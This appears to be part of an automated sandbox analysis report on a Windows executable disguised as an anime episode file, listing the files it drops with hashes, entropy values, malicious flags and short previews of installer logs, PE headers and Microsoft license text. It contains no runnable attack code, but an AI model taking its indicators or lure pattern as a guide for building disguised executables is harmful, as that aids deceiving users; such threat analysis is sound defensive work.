                                                                        Preview:[085C:055C][2023-01-02T15:35:24]i001: Burn v3.10.4.4718, Windows v10.0 (Build 17134: Service Pack 0), path: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe..[085C:055C][2023-01-02T15:35:24]i003: This bundle is being run by a related bundle as type 'Upgrade'...[085C:055C][2023-01-02T15:35:24]i009: Command Line: '"-burn.clean.room=C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.filehandle.attached=540 -burn.filehandle.self=564 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded BurnPipe.{652D427C-3FCF-4F57-9B0A-0FFBCA2578FC} {CF7111B3-FF83-47BF-A56D-0E99B89A84C1} 5468'..[085C:055C][2023-01-02T15:35:26]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153526.log'..[085C:055C][2023-01-02T15:35:26]i000: Setting string variable 'WixBundleManufacturer' to value

                                                                        C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153532.log

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:ASCII text, with very long lines (442), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):10979
                                                                        Entropy (8bit):5.407189727137652
                                                                        Encrypted:false
                                                                        SSDEEP:192:sTiLxXvnAc1j1J1O1+1t1T1w1khWE2DtcEVitVgKX7ll1leRbobqZ2DQPlHaOd:sExf1lnd2
                                                                        MD5:AD5937EE185B6A4124BB7FDDF79B2BF2
                                                                        SHA1:B84E382F0E68A816783A7787C55E5B1EB062FB53
                                                                        SHA-256:CEC59E151C1CE895650B1A250E2837C13EB8740426BB30C181E0AFE0FCBD66BF
                                                                        SHA-512:B06894F0D9F34AB13FA8B7E964BC3C088F22A9AC84A24176B27046A9081B77A15BCAD344894A16B9DB20B24CE947F4D2D10C77911B3F0BCBA233D0887C9B625D
                                                                        Malicious:false
                                                                        Preview:[0FA8:0CA0][2023-01-02T15:35:27]i001: Burn v3.10.4.4718, Windows v10.0 (Build 17134: Service Pack 0), path: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe..[0FA8:0CA0][2023-01-02T15:35:27]i003: This bundle is being run by a related bundle as type 'Upgrade'...[0FA8:0CA0][2023-01-02T15:35:27]i009: Command Line: '"-burn.clean.room=C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.filehandle.attached=576 -burn.filehandle.self=572 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded BurnPipe.{8ADE75BE-8C64-4D11-B05A-A6C78AECD63F} {6EE058D7-D097-43E8-87F0-A357D97D5238} 1324'..[0FA8:0CA0][2023-01-02T15:35:32]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153532.log'..[0FA8:0CA0][2023-01-02T15:35:32]i000: Setting string variable 'WixBundleName' to value 'Microso

                                                                        C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):3014144
                                                                        Entropy (8bit):6.394084543221017
                                                                        Encrypted:false
                                                                        SSDEEP:49152:QLJwSihjOb6GLb4SKEs3DyOMC2DlgwccAP8SOHxVkTE0:swSi0b67zeC/wccAP85H
                                                                        MD5:F16A37D7AF3DB8C75F19AF9B3453D9C8
                                                                        SHA1:F9D7D6F6FB576A3A4EA21242DA573F3CD2E6CF7B
                                                                        SHA-256:331D38B58C12BEDDFDBF6AC6AF1BB6B701907897EDD2C932D59397DB63853047
                                                                        SHA-512:9BBB342DE5E188B869A5C4FFB8DE845D96DB40481238EF002869E4DF8795DE2D891ED3A3401837605F2A9525FCAB62F5EBD3AA5DA47B204625F1EC14CC27E9E7
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....]_.................$,.........P6,......@,...@.......................................@......@....................-......`-.49....-.......................................................-......................i-.......-......................text...0.+.......+................. ..`.itext..t(....,..*....+............. ..`.data.......@,......(,.............@....bss.....x....,..........................idata..49...`-..:....,.............@....didata.......-.......,.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc.........-.......-.............@..@......................-.............@..@........................................................

                                                                        C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):3014144
                                                                        Entropy (8bit):6.394084543221017
                                                                        Encrypted:false
                                                                        SSDEEP:49152:QLJwSihjOb6GLb4SKEs3DyOMC2DlgwccAP8SOHxVkTE0:swSi0b67zeC/wccAP85H
                                                                        MD5:F16A37D7AF3DB8C75F19AF9B3453D9C8
                                                                        SHA1:F9D7D6F6FB576A3A4EA21242DA573F3CD2E6CF7B
                                                                        SHA-256:331D38B58C12BEDDFDBF6AC6AF1BB6B701907897EDD2C932D59397DB63853047
                                                                        SHA-512:9BBB342DE5E188B869A5C4FFB8DE845D96DB40481238EF002869E4DF8795DE2D891ED3A3401837605F2A9525FCAB62F5EBD3AA5DA47B204625F1EC14CC27E9E7
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....]_.................$,.........P6,......@,...@.......................................@......@....................-......`-.49....-.......................................................-......................i-.......-......................text...0.+.......+................. ..`.itext..t(....,..*....+............. ..`.data.......@,......(,.............@....bss.....x....,..........................idata..49...`-..:....,.............@....didata.......-.......,.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc.........-.......-.............@..@......................-.............@..@........................................................

                                                                        C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe (copy)

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):25466016
                                                                        Entropy (8bit):7.996942692984511
                                                                        Encrypted:true
                                                                        SSDEEP:786432:tEp+Ty2SfUfnLZnvko+Me/ht8+0c4Nz55TOZHzqnIlh:yp+Ty2SfWnVvkodepC+05NbOZHzqnIlh
                                                                        MD5:703BD677778F2A1BA1EB4338BAC3B868
                                                                        SHA1:A176F140E942920B777F80DE89E16EA57EE32BE8
                                                                        SHA-256:2257B3FBE3C7559DE8B31170155A433FAF5B83829E67C589D5674FF086B868B9
                                                                        SHA-512:A66EA382D8BDD31491627FD698242D2EDA38B1D9DF762C402923EF40BBCA6AA2F43F22FA811C5FC894B529F9E77FCDD5CED9CD8AF4A19F53845FCE3780E8C041
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'.u.'.u.'.u.......u.....[.u.....?.u...v.4.u...q.4.u...p...u.....".u....6.u.'.t.v.u...p.l.u....&.u.'..%.u...w.&.u.Rich'.u.........................PE..L......Z.....................v......m.............@..........................p......q.....@..............................................;...........l...(...0...=.. t..T...................tt......@n..@...................$........................text.............................. ..`.rdata..............................@..@.data...@...........................@....wixburn8...........................@..@.tls................................@....gfids..............................@..@.rsrc....;.......<..................@..@.reloc...=...0...>..................@..B........................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\_isetup\_setup64.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):6144
                                                                        Entropy (8bit):4.720366600008286
                                                                        Encrypted:false
                                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\is-DLQHQ.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):25466016
                                                                        Entropy (8bit):7.996942692984511
                                                                        Encrypted:true
                                                                        SSDEEP:786432:tEp+Ty2SfUfnLZnvko+Me/ht8+0c4Nz55TOZHzqnIlh:yp+Ty2SfWnVvkodepC+05NbOZHzqnIlh
                                                                        MD5:703BD677778F2A1BA1EB4338BAC3B868
                                                                        SHA1:A176F140E942920B777F80DE89E16EA57EE32BE8
                                                                        SHA-256:2257B3FBE3C7559DE8B31170155A433FAF5B83829E67C589D5674FF086B868B9
                                                                        SHA-512:A66EA382D8BDD31491627FD698242D2EDA38B1D9DF762C402923EF40BBCA6AA2F43F22FA811C5FC894B529F9E77FCDD5CED9CD8AF4A19F53845FCE3780E8C041
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'.u.'.u.'.u.......u.....[.u.....?.u...v.4.u...q.4.u...p...u.....".u....6.u.'.t.v.u...p.l.u....&.u.'..%.u...w.&.u.Rich'.u.........................PE..L......Z.....................v......m.............@..........................p......q.....@..............................................;...........l...(...0...=.. t..T...................tt......@n..@...................$........................text.............................. ..`.rdata..............................@..@.data...@...........................@....wixburn8...........................@..@.tls................................@....gfids..............................@..@.rsrc....;.......<..................@..@.reloc...=...0...>..................@..B........................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\is-QUMRA.tmp\_isetup\_setup64.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):6144
                                                                        Entropy (8bit):4.720366600008286
                                                                        Encrypted:false
                                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1028\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):18415
                                                                        Entropy (8bit):4.043868285184243
                                                                        Encrypted:false
                                                                        SSDEEP:192:Haz4aHQbC6dBCLCNavmu6OqSPEmmVUJ9etKL5W2cBxGC4iSM0fvJ9seyryH1mqGI:2yk/RF8e7GWU2
                                                                        MD5:2B063D92663595DFE4781AE687A03D86
                                                                        SHA1:0FB582E756DBC751EA380593AC4DA27DDB4EBB06
                                                                        SHA-256:44C76290F7A2E45940E8338912FEB49BCF4E071CFA85D2D34762857743ACBC8D
                                                                        SHA-512:94C8FDA6173C7F5740F206190EDCD1F1F1C309596B710D400E23CD363A619D707A5D4576D4FE63AB7CB68947F009EFD29A1FBE04743A294698BF2AE17E92C214
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset134 SimSun;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT \f1\'dc\'9b\'f3\'77\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\f0\par..MICROSOFT VISUAL C++ 2015 - 2022 \f1\'88\'cc\'d0\'d0\'eb\'41\'b6\'ce\f0 \par..\b0\f1\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'ca\'c7\'d9\'46\'d3\'c3\'91\'f4\'c5\'63\f0 Microsoft Corporation (\f1\'bb\'f2\'c6\'e4\'ea\'50\'82\'53\'c6\'f3\'98\'49\'a3\'ac\'d2\'95\'d9\'46\'d3\'c3\'91\'f4\'cb\'f9\'be\'d3\'d7\'a1\'b5\'c4\'b5\'d8\'fc\'63\'b6\'f8\'b6\'a8\f0 ) \f1\'d6\'ae\'e9\'67\'b3\'c9\'c1\'a2\'b5\'c4\'ba\'cf\'bc\'73\'a1\'a3\'cb\'fc\'82\'83\'df\'6d\'d3\'c3\'ec\'b6\'c9\'cf\'ca\'f6\'dc\'9b\'f3\'77\'a1\'a3\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'d2\'e0\'df\'6d\'d3\'c3\'ec\'b6\'c8\'ce\'ba\'ce\f0 Microsoft \f1\'b7\'fe\'84\'d5\

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1028\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2980
                                                                        Entropy (8bit):6.163758160900388
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOtMes9T/JhDXsA9EHSniarRFeOrw8N3mZNNTN2N08CEjMUWFPmDlTKJKy2:uDiTlFrDDsA9tfHP8+8nhM0WamzqDFqD
                                                                        MD5:472ABBEDCBAD24DBA5B5F5E8D02C340F
                                                                        SHA1:974F62B5C2E149C3879DD16E5A9DBB9406C3DB85
                                                                        SHA-256:8E2E660DFB66CB453E17F1B6991799678B1C8B350A55F9EBE2BA0028018A15AD
                                                                        SHA-512:676E29378AAED25DE6008D213EFA10D1F5AAD107833E218D71F697E728B7B5B57DE42E7A910F121948D7B1B47AB4F7AE63F71196C747E8AE2B4827F754FC2699
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">....</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ................. ......................../passive | /quiet - .... UI ........... UI.... ........... UI ........../norestart - ................UI ............./log log.txt - .........

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1029\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13234
                                                                        Entropy (8bit):5.125368352290407
                                                                        Encrypted:false
                                                                        SSDEEP:192:T7wfl7OGpX5a5HEgQ2psch5jotXxEvH++3kamdyjCrDZugDHgbGNl86NhrYGY9D2:Yfl7O5ocINaHmjI44fUixAvOwwrJ2
                                                                        MD5:E7DC9CA9474A13FA4529D91BCD2AB8CC
                                                                        SHA1:511F5DE8A99C09EC3766C5E2494A79EACCA261C8
                                                                        SHA-256:503C433DCDE2F3A9E7D388A5FF2B0612E7D8F90F5188D5B2B60228DB33044FDE
                                                                        SHA-512:77108E53CD58E42F847D8EF23A07723C4849DC41DBE1C3EF939B9170E75F525BEC9D210D6C1FBFEB330ECE2E77B8A8E2808730D9E6F72F5B3FE626D58B6068C6
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 LICEN\f1\'c8N\f0\'cd PODM\'cdNKY PRO SOFTWARE SPOLE\f1\'c8NOSTI MICROSOFT\par..\f0 MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0 Tyto licen\f1\'e8n\f0\'ed podm\'ednky p\f1\'f8edstavuj\f0\'ed smlouvu mezi spole\f1\'e8nost\f0\'ed Microsoft Corporation (nebo n\f1\'eckterou z jej\f0\'edch afilac\'ed, v\~z\'e1vislosti na tom, kde bydl\'edte) a v\'e1mi. Vztahuj\'ed se na v\'fd\f1\'9ae uveden\f0\'fd software. Podm\'ednky se rovn\f1\'ec\'9e vztahuj\f0\'ed na jak\'e9koli slu\f1\'9eby Microsoft nebo aktualizace pro software, pokud se na slu\'9eby nebo aktualizace nevztahuj\f0\'ed odli\f1\'9an\f0\'e9 podm\'ednky.\par..\b DODR\f1\'8e\f0\'cdTE-LI

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1029\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3333
                                                                        Entropy (8bit):5.370651462060085
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOtesM6H2hDdxHOjZxsaIIy3Iy5sDMN3mkNFN7NwcfiPc3hKPnWZLF0hKqZ:uDiTlVxxHOy/9xXfpZJYnL8xK2S
                                                                        MD5:16343005D29EC431891B02F048C7F581
                                                                        SHA1:85A14C40C482D9351271F6119D272D19407C3CE9
                                                                        SHA-256:07FB3EC174F25DFBE532D9D739234D9DFDA8E9D34F01FE660C5B4D56989FA779
                                                                        SHA-512:FF1AE9C21DCFB018DD4EC82A6D43362CB8C591E21F45DD1C25955D83D328B57C8D454BBE33FBC73A70DADF1DFB3AE27502C9B3A8A3FF2DA97085CA0D9A68AB03
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instala.n. program [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Opravdu chcete akci zru.it?</String>.. <String Id="HelpHeader">N.pov.da nastaven.</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [adres..] . Nainstaluje, oprav., odinstaluje nebo.. vytvo.. .plnou m.stn. kopii svazku v adres..i. V.choz. mo.nost. je instalace...../passive | /quiet . Zobraz. minim.ln. u.ivatelsk. rozhran. bez v.zev nebo nezobraz. ..dn. u.ivatelsk. rozhran. a.. ..dn. v.zvy. V.choz. mo.nost. je zobrazen. u.ivatelsk.ho rozhran. a v.ech v.zev...../noresta

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1031\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):12392
                                                                        Entropy (8bit):5.192979871787938
                                                                        Encrypted:false
                                                                        SSDEEP:192:N6AY7JCc/2WVJtntrUqMmvuUh+mxYpnY4+ZqDe6mUZaEzYNvQ8yOejISRC4WL32:PUw2lSSssWVzOHyOejIS/22
                                                                        MD5:2DDCA2866D76C850F68ACDFDB696D6DE
                                                                        SHA1:C5076F10B0F0654CDE2C990DEEB2772F3CC4844B
                                                                        SHA-256:28F63BAD9C2960395106011761993049546607F8A850D344D6A54042176BF03F
                                                                        SHA-512:E3A3693B92873E0B42007616FF6916304EDC5C4F2EEE3E9276F87E86DD94C2BF6E1CF4E895CDF9A1AA0CAC0B381B8840EEE1F491123E901DEE75638B8BC5CE1B
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil Tahoma;}{\f3\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT-SOFTWARE-LIZENZBEDINGUNGEN\par..MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0 Diese Lizenzbestimmungen stellen eine Vereinbarung zwischen Ihnen und der Microsoft Corporation (bzw. abh\'e4ngig von Ihrem Wohnsitz einem ihrer Affiliate-Partner) dar. Sie gelten f\'fcr die oben angef\'fchrte Software. Die Bestimmungen gelten ebenso f\'fcr jegliche von Microsoft angebotenen Dienste oder Updates f\'fcr die Software, sofern diesen keine anderen Bestimmungen beiliegen.\par..\b WENN SIE DIESE LIZENZBESTIMMUNGEN EINHALTEN, VERF\'dcGEN SIE \'dcBER DIE NACHFOLGEND AUFGEF\'dcHRTEN RECHTE.\par....\pard{\pntext\f3\'B7\tab}{\*\pn\pnlvlblt\pnf3\pnindent360{\pntxtb\'B7}}\

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1031\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3379
                                                                        Entropy (8bit):5.094097800535488
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOZuesXJhDEVTORNxSMoZN3mteNSiNGNsZuiAXEqicMwhPXbhu9KwKlK8Kq:uDiTl3N7xSbu0N8+AhSNnm
                                                                        MD5:561F3F32DB2453647D1992D4D932E872
                                                                        SHA1:109548642FB7C5CC0159BEDDBCF7752B12B264C0
                                                                        SHA-256:8E0DCA6E085744BFCBFF46F7DCBCFA6FBD722DFA52013EE8CEEAF682D7509581
                                                                        SHA-512:CEF8C80BEF8F88208E0751305DF519C3D2F1C84351A71098DC73392EC06CB61A4ACA35182A0822CF6934E8EE42196E2BCFE810CC859965A9F6F393858A1242DF
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] - Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">M.chten Sie den Vorgang wirklich abbrechen?</String>.. <String Id="HelpHeader">Setup-Hilfe</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [Verzeichnis] - installiert, repariert, deinstalliert oder.. erstellt eine vollst.ndige lokale Kopie des Bundles im Verzeichnis. Installieren ist die Standardeinstellung...../passive | /quiet - zeigt eine minimale Benutzeroberfl.che ohne Eingabeaufforderungen oder keine.. Benutzeroberfl.che und keine Eingabeaufforderungen an. Standardm..ig werden die Benutzeroberfl.che und alle Eingab

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1036\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):12349
                                                                        Entropy (8bit):5.108676965693909
                                                                        Encrypted:false
                                                                        SSDEEP:384:7Jja9NaNbUmVao9L5EOMjWghxjUSeuDSej2:dj84gmVz9EDjW8GSZC
                                                                        MD5:A6E352E5804313CCDE3E4D5DDDDE122D
                                                                        SHA1:834E3AAA07DC675589A9E5FCD23CE5586C2739E8
                                                                        SHA-256:5C13A65870D770D1642A4259EECB436257CA39016A0500F747BE9C79BE0C7009
                                                                        SHA-512:6578AC6467F61930BC1B20E404441725C63790C65AEC1ACE297429EAD15F50E68D5FE9CC1451AC86AE23DC1A7FE967650166293010D687785FB81FB4492B87C4
                                                                        Malicious:false
                                                                        Preview:{\rtf1\fbidis\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil\fcharset177 Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\ltrpar\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 TERMES DU CONTRAT DE LICENCE LOGICIEL MICROSOFT\par..MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0 Les pr\'e9sentes conditions de licence constituent un contrat entre Microsoft Corporation (ou en fonction de votre lieu de r\'e9sidence, l\f1\rquote\f0 un de ses affili\'e9s) et vous. Ils s\f1\rquote\f0 appliquent au logiciel vis\'e9 ci-dessus. Les termes s\f1\rquote\f0 appliquent \'e9galement \'e0 tout service et \'e0 toute mise \'e0 jour Microsoft pour ce logiciel, \'e0 moins que d\f1\rquote\f0 autres termes n\f1\rquote\f0 accompagnent ces \'e9l\'e9ments.\par..\b SI VOUS VOUS CONFORMEZ AUX PR\'c9SENTS TERMES DU CONTRAT D

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1036\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3366
                                                                        Entropy (8bit):5.0912204406356905
                                                                        Encrypted:false
